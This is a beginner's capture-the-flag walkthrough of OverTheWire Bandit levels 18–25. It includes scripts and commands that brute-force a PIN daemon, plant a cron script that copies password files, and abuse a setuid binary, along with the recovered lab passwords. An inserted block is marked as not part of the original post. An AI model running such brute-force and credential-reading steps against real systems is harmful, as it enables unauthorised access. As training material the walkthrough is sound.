OTW – Bandit

These are security problems from OverTheWire. Bandit is for beginners. Note that I put the answers here as well, since I use this page as a record of where I stopped.

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


Again, I created a folder inside /tmp and made sure that both the newly created folder and all the files related to this level have proper permissions (chmod 755 is enough).

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

# Four brace expansions generate every pincode from 0000 to 9999.
for a in {0..9}{0..9}{0..9}{0..9}
do
    # Send "<password> <pincode>" to the daemon and append its reply to result.
    # The trailing & backgrounds each nc so the loop does not wait for it.
    echo "$passwd $a" | nc localhost 30002 >> result &
done

# Wait for all the background connections before the script exits.
wait

I chose to use netcat (nc), but telnet works just as well. The pincode a is generated by four brace expansions. The >> appends the output to the file result. The & puts the command in the background so the loop can start the next iteration immediately; this saved me a lot of time waiting for the script to finish. To improve on this, I would need a way to terminate the loop when the correct answer is displayed. However, I did not know what the correct message would look like at the beginning.

Using the same strategy of finding a unique line as in Level 8 → Level 9, we see that the password for the next level is the unique line of the result file.

$ sort result | uniq -u
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Doing the same thing as in the last level, we find the following script:

cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
    echo "Handling $i"
    ./$i
    rm -f $i
done

From the script, it executes every script inside the /var/spool/$myname folder and then deletes it. We found that there is a bandit24 folder in /var/spool/. Therefore, let's write a simple script that copies the password to a tmp folder (like two levels before).

mkdir /tmp/b23abc
vim /tmp/b23abc/getpass.sh
cat /tmp/b23abc/getpass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/b23abc/pass.txt

At this point I could copy the file to /var/spool/bandit24/, but I remembered that the execute permission must be set first.

chmod 777 /tmp/b23abc/getpass.sh
cp /tmp/b23abc/getpass.sh /var/spool/bandit24/

However, after a couple of minutes, no pass.txt had appeared in the folder. What I forgot was to set the permissions of the folder that pass.txt is written into. After fixing that and waiting another minute, the file appears and contains the next password.

chmod 777 /tmp/b23abc/
cat /tmp/b23abc/pass.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Bandit Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)


Doing the same thing as in the last level, we find the following script:

cat cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

cat /usr/bin/cronjob_bandit23.sh

#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

I notice that whoami gives the current user, in this case bandit22. So I should change that, but I wasn't sure how. Let's run the script and see what happens.

/usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3

So I know that if we change bandit22 to bandit23, we get a file that has the password for bandit23. The long file name is the md5 hash computed for mytarget. Let's execute that same line but with $myname replaced by bandit23. We get another long string, and looking at the content of that file in the tmp folder gives us the next password.

echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
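The path derivation from the cron script above, as an added shell example that is not part of the original post: it reproduces the md5 step for any user name and shows that the trailing newline added by echo changes the hash (the function names are my own; it assumes md5sum from coreutils).

```shell
# Added example (not from the original post): predict the /tmp file the
# cron script writes for a given user, without running it as that user.

# echo appends a newline, so the script hashes "I am user NAME\n".
# printf with an explicit \n reproduces that exactly.
target_for_user() {
    printf 'I am user %s\n' "$1" | md5sum | cut -d ' ' -f 1
}

# Hashing the same string WITHOUT the newline yields a different path;
# this is the usual mistake when recomputing the hash by hand or in
# another language.
target_without_newline() {
    printf 'I am user %s' "$1" | md5sum | cut -d ' ' -f 1
}

# Print the predicted path for each user this level mentions.
for u in bandit22 bandit23; do
    printf '%s -> /tmp/%s\n' "$u" "$(target_for_user "$u")"
done
```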

Bandit Level 21 → Level 22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)


From the level goal, we first visit /etc/cron.d and find some files. In particular, the file named cronjob_bandit22 seems to be the one we are interested in. It shows the location of a cronjob_bandit22.sh script. Once again, we look at the script.

cat cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Someone is dumping the password of bandit22 into a tmp file. We once again cat the tmp file and find the next password.

cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Bandit Level 20 → Level 21

Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think


We can see that suconnect needs to be executed. Let's see what it is for.

./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. 
If it receives the correct password from the other side, the next 
password is transmitted back.

As the NOTE suggests, we need two sessions: one listens on a port and sends the current password, and the other reads it and sends back the password for the next level. We use nc to listen on a port of our choosing and feed it the current password.

nc -l 32123 < /etc/bandit_pass/bandit20

In another ssh session, we start suconnect on the same port and are immediately greeted with what we sent to it.

./suconnect 32123
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

Looking back at the first ssh session, the following message pops up with the next password.

gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Bandit Level 19 → Level 20

Level Goal

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.


Looking at the home directory, we see a file bandit20-do owned by bandit20 and accessible by bandit19. The permission of the file is rws. The s (setuid) permission means that when the file is executed, it runs with the permissions of the owner.

-rwsr-x--- 1 bandit20 bandit19 7237 Jun 6 2013 bandit20-do

Since the owner is bandit20, we can run this and use the elevated permissions to look at the next password. Just running it tells us that we can run a command.

./bandit20-do
Run a command as another user.
 Example: ./bandit20-do id

In this case, let's cat the password file and find out the password for bandit20.

./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Bandit Level 18 → Level 19

Level Goal

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

Commands you may need to solve this level

ssh, ls, cat


From the ssh man page, we can append a command after the login to execute it. Since we know which file the password is stored in, we can just display the file before we get logged out.

ssh bandit18@bandit.labs.overthewire.org cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

Another way is to use scp (secure file transfer) with the private key we created in Level 16 → Level 17 to copy the file from the bandit18 home directory to /tmp. Everything is done inside bandit17 with the bandit18 login password. The password obtained from both methods is the same, as expected.

scp -i /tmp/key/b16pkey bandit18@localhost:readme /tmp/tmpfile/readme
cat /tmp/tmpfile/readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5